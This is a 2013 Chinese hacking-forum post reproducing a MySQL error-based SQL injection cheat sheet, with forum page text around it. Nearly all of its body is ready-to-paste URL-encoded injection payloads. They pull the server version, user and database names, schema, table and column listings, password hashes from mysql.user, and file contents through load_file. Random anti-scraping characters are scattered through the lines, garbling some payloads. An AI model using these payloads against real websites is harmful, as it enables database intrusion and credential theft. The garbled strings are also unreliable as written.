找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2293|回复: 0
打印 上一主题 下一主题

Mysql暴错注入参考(pdf)

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-27 11:00:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
$ l  c7 W6 s7 U
4 \* v0 _5 L. H6 B% a4 [9 R' O, o6 T# N3 ^
Mysql暴错注入参考(pdf),每天一贴。。。
/ [( C2 H& p$ g/ g* H: B9 a% d+ k2 C
MySql Error Based Injection Reference. i/ C; p$ v* I* p. x9 ~. C
[Mysql暴错注入参考]4 o0 A" P5 z: j9 h$ p' I# |: D: q
Authornig0s1992- l" L2 s% T4 V4 S+ M+ R- L! m  m7 m
Blog:http://pnig0s1992.blog.51cto.com/
3 u+ W( c* X* E% Z& P# d3 [; M+ DTeAm:http://www.FreeBuf.com/* O& l" A3 ?' p! q7 m
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
$ B" x/ w8 K# z7 m; ]/ @  W小部分版本使用name_const()时会报错.可以用给出的Method.2测试
; ?( N! `% ~: x1 v查询版本:
' g$ W1 {6 y3 N/ aMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
5 [) E+ \& c% Fjoin+(select+name_const(@@version,0))b)c)! k5 n* d; D  n  a9 w
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro$ O8 X) l! X# Y5 A7 [, Y4 ~- E$ P
up by a)b)# _3 e: o1 l, S  M/ R" \) V
查询当前用户:
2 s5 q& L: v; Y: EMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
8 U) B- p% |% \$ fMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
0 {9 m0 e2 i' ^/ p% }7 B; O4 N; Dand(0)*2))x+from+information_schema.tables+group+by+x)a)
# c$ t' N( a2 C: t, S( Y+ Q: @查询当前数据库:
. x1 m  j2 o. d) |Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)7 |- P. v! q, W
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
3 v. M8 l2 F# @: X4 B% B7 u2 {  `or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
) E6 \! O- |- W: t2 G) k: t依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+/ E' ^5 I$ ~/ y% M( p
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
. t/ f' Y" e1 {顺序替换. C5 D) D  c8 d5 Z# B$ S2 ]
爆指定库数目:% O4 I) t# _) M$ s( j
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t6 X$ |1 W5 t" |. f, d
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
1 H( f  D" w. @$ H+by+x)a)+and+1=1 0x6D7973716C=mysql$ `; o: G: x  I" Q6 u$ k5 k) |
依次爆表:
6 y9 Q* p2 _* k/ W: ~- rand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
, Q" N. v9 v1 i. Eable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
/ g1 c+ R7 [5 O3 jbles+group+by+x)a)+and+1=1
% F+ z- I6 u# A* T0x6D7973716C=Mysql 将n顺序替换8 k7 r# b/ h0 @
爆表内字段数目:: L% Q$ w% j# w8 J8 `3 k4 C
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
$ K& O  O  p6 c9 h1 {+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
& v/ f( x8 v7 S& T3 b0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1. K, d$ E9 H2 @
依次爆字段:. p+ J2 u: I( }; z! E# `/ L
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where" s. o& D8 D- g# G% F# }  I
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1$ I: X: {; h% O8 Y! L1 [
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换7 q# Z8 R) H) i1 C6 b( I' k
依次暴内容:
: y8 t% U/ I8 x4 nand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
0 c. f: r; s1 bma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
- u4 @& x1 t+ R2 G" s' l, n将n顺序替换0 Y5 E" z, W' Q, c! W8 [" |% ]  B; Z
爆文件内容:
/ i/ o$ z/ D1 Eand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
/ B' f* `6 I, y/ O, l' \# [' f) afrom+information_schema.tables+group+by+a)b)
+ A+ Z- g0 q- @8 [/ I0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
. a+ o2 H4 I. TThx for reading.
4 k8 l, V2 F, I1 O/ o
/ T9 _' Y. h+ q/ F8 h+ {/ q, g不要下载也可以, $ a, B# {7 L/ K9 u0 H

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表